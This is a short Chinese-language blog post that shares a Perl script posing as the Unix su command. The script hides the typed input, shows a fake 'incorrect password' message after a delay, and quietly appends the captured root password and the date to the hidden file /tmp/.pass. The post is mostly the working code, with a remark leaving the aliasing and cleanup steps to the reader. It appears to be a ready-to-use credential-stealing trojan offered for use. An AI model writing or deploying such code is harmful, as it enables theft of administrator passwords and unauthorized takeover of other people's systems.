冒充su ,perl写的su.pl盗取root密码

时间:2022-04-11 23:41:18

我改了一下,把回显关了 加了个延时:

  1. #!/usr/bin/perl  
  2. # Written by xi4oyu <evil.xi4oyu@gmail.com>.  
  3.  
  4. print "Password: ";  
  5. `stty -echo`;  
  6. $s1=<STDIN>;  
  7. print "\n";  
  8. `stty echo`;  
  9. sleep 3;  
  10. print "su: incorrect password\n";  
  11. chomp($s1);  
  12. $s2="Password is: ";  
  13. $s3=" ".`date +%Y-%m-%d`;  
  14. open (users, ">>/tmp/.pass") || die ;  
  15. print users ($s2, $s1,$s3);  
  16. close (users);  

很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!